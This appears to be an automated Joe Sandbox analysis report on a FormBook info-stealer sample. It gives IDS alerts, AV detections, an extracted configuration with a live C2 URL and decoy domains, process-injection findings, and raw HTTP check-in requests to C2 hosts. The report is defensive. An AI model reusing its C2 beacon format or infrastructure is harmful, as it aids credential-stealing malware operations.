ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 3.33.130.190

Timestamp:	192.168.2.43.33.130.19049743802031412 02/14/24-15:18:54.070107
SID:	2031412
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 154.86.173.213

Timestamp:	192.168.2.4154.86.173.21349740802031412 02/14/24-15:16:54.498158
SID:	2031412
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 104.21.9.22

Timestamp:	192.168.2.4104.21.9.2249745802031412 02/14/24-15:19:55.217369
SID:	2031412
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	192.168.2.491.195.240.1949744802031412 02/14/24-15:19:14.453347
SID:	2031412
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.budgetnurseries.com/gy14/www.loscaseros.com	Avira URL Cloud: Label: malware
Source: http://www.8x101n.xyz/gy14/www.mtdiyx.xyz	Avira URL Cloud: Label: phishing
Source: http://www.smnyg.com/gy14/?MRmX=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&J61h=CBZhCFnx-	Avira URL Cloud: Label: malware
Source: http://www.naples.beauty/gy14/?MRmX=Go8vTrGGndHO0U55xCKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBTDnF66GZzA&J61h=CBZhCFnx-	Avira URL Cloud: Label: malware
Source: http://www.zezfhys.com/gy14/www.batuoe.com	Avira URL Cloud: Label: malware
Source: http://www.venitro.com	Avira URL Cloud: Label: malware
Source: http://www.mtdiyx.xyz/gy14/www.whatsapp1.autos	Avira URL Cloud: Label: phishing
Source: http://www.budgetnurseries.com	Avira URL Cloud: Label: malware
Source: http://www.mtdiyx.xyz/gy14/	Avira URL Cloud: Label: phishing
Source: http://www.truedatalab.com	Avira URL Cloud: Label: malware
Source: http://www.mrbmed.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.dianetion.com/gy14/www.budgetnurseries.com	Avira URL Cloud: Label: malware
Source: http://www.tulisanemas.com/gy14/www.zezfhys.com	Avira URL Cloud: Label: malware
Source: http://www.batuoe.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.beautyloungebydede.online/gy14/www.truedatalab.com	Avira URL Cloud: Label: malware
Source: http://www.tulisanemas.com/gy14/?MRmX=TVW95z+++zY0L5llmiI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/YaR4gl/q+pE&J61h=CBZhCFnx-	Avira URL Cloud: Label: malware
Source: http://www.whatsapp1.autos/gy14/www.venitro.com	Avira URL Cloud: Label: malware
Source: http://www.tulisanemas.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.theanhedonia.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.zezfhys.com	Avira URL Cloud: Label: malware
Source: http://www.naples.beauty/gy14/www.8x101n.xyz	Avira URL Cloud: Label: malware
Source: http://www.mtdiyx.xyz	Avira URL Cloud: Label: malware
Source: http://www.truedatalab.com/gy14/www.dianetion.com	Avira URL Cloud: Label: malware
Source: http://www.venitro.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.8x101n.xyz/gy14/	Avira URL Cloud: Label: phishing
Source: http://www.smnyg.com/gy14/	Avira URL Cloud: Label: malware
Source: http://www.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx-	Avira URL Cloud: Label: malware
Source: http://www.naples.beauty/gy14/	Avira URL Cloud: Label: malware
Source: http://www.venitro.com/gy14/www.tulisanemas.com	Avira URL Cloud: Label: malware
Source: http://www.theanhedonia.com/gy14/www.beautyloungebydede.online	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}

Multi AV Scanner detection for domain / URL

Source: www.theanhedonia.com	Virustotal: Detection: 9%	Perma Link
Source: venitro.com	Virustotal: Detection: 12%	Perma Link
Source: http://www.mtdiyx.xyz/gy14/www.whatsapp1.autos	Virustotal: Detection: 12%	Perma Link
Source: http://www.whatsapp1.autos/gy14/www.venitro.com	Virustotal: Detection: 9%	Perma Link
Source: http://www.venitro.com/gy14/	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: z2______________________________.exe	ReversingLabs: Detection: 55%
Source: z2______________________________.exe	Virustotal: Detection: 63%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4099606416.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1682100755.00000000038F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099550212.0000000003180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: z2______________________________.exe

Joe Sandbox ML: detected

Source: z2______________________________.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: z2______________________________.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000006.00000002.4111127345.000000001121F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4099418999.000000000309B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000535F000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.1730241284.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1727822863.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099237458.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1729617014.0000000004C61000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000003.1727198042.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000003.1729617014.0000000004C61000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000003.1727198042.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.1730241284.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1727822863.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4099237458.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000006.00000002.4111127345.000000001121F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4099418999.000000000309B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000535F000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop esi	5_2_004172D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop esi	5_2_00417287
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	5_2_0040E46A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	5_2_00416CC5
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	8_2_00CCE46A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	8_2_00CD6CC5
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop esi	8_2_00CD72D9
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop esi	8_2_00CD7287

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49740 -> 154.86.173.213:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49742 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49743 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49744 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 104.21.9.22:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49746 -> 103.224.212.212:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.86.173.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.9.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.venitro.com/gy14/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.8x101n.xyz

Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&J61h=CBZhCFnx- HTTP/1.1Host: www.smnyg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=Go8vTrGGndHO0U55xCKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBTDnF66GZzA&J61h=CBZhCFnx- HTTP/1.1Host: www.naples.beautyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&J61h=CBZhCFnx- HTTP/1.1Host: www.venitro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=TVW95z+++zY0L5llmiI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/YaR4gl/q+pE&J61h=CBZhCFnx- HTTP/1.1Host: www.tulisanemas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=OxUWq4r9zCPbX1rkIj+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t17xtdzA0+Hh&J61h=CBZhCFnx- HTTP/1.1Host: www.batuoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx- HTTP/1.1Host: www.theanhedonia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.212.212 103.224.212.212
Source: Joe Sandbox View	IP Address: 154.86.173.213 154.86.173.213
Source: Joe Sandbox View	IP Address: 91.195.240.19 91.195.240.19

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 6_2_0F985F82 getaddrinfo,setsockopt,recv,

6_2_0F985F82

Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=e48KmGNPZ4HzO62J+BAEgJ7f72GC8C2SYwaKtCk56/rw6z0woMJSdTiOaB/ULaR4VT+G&J61h=CBZhCFnx- HTTP/1.1Host: www.smnyg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=Go8vTrGGndHO0U55xCKSgIW+IdqdbLSyuJQv9ABJU2ERxA5ov3fqO1PElBTDnF66GZzA&J61h=CBZhCFnx- HTTP/1.1Host: www.naples.beautyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&J61h=CBZhCFnx- HTTP/1.1Host: www.venitro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=TVW95z+++zY0L5llmiI+edXNZ9WzZwQpiu6hZuLz+N2V81RbOedsJ4kc/YaR4gl/q+pE&J61h=CBZhCFnx- HTTP/1.1Host: www.tulisanemas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=OxUWq4r9zCPbX1rkIj+3VkXdtndMquKVSz0uWKIZ3KtG35y0CyAOaPR4t17xtdzA0+Hh&J61h=CBZhCFnx- HTTP/1.1Host: www.batuoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&J61h=CBZhCFnx- HTTP/1.1Host: www.theanhedonia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.smnyg.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 14:19:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2HN5kJnfdYOhBIGjq%2FugsKYxf4reRrkExYHQYaKAh%2BSWinJaE4rA3wGIQ%2BLPOC%2BLKK%2B3hlpHxmEqAxsuaLbnaR%2BMKw2QEe0Pcaf9W8xgENuIfSwonT%2FNSzPC9zRC8yzW7w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8555f2e669c6adac-ATLalt-svc: h3=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: explorer.exe, 00000006.00000000.1672845472.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000000.1672845472.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.1672845472.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: explorer.exe, 00000006.00000000.1672845472.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000002.4101465452.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000006.00000000.1667913063.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000006.00000000.1670704175.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4102494791.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1674455372.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: z2______________________________.exe, 00000000.00000002.1680655312.0000000002716000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000002.4111127345.000000001170F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4100435255.000000000584F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ww25.theanhedonia.com/gy14/?MRmX=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8x101n.xyz
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8x101n.xyz/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8x101n.xyz/gy14/www.mtdiyx.xyz
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8x101n.xyzReferer:
Source: z2______________________________.exe, 00000000.00000002.1685189445.0000000005832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.com/gy14/
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.com/gy14/www.theanhedonia.com
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.batuoe.comReferer:
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beautyloungebydede.online
Source: explorer.exe, 00000006.00000003.3105755396.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4109475560.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105567133.000000000CA87000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105264534.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3427621721.000000000CB28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.beautyloungebydede.online/gy14/
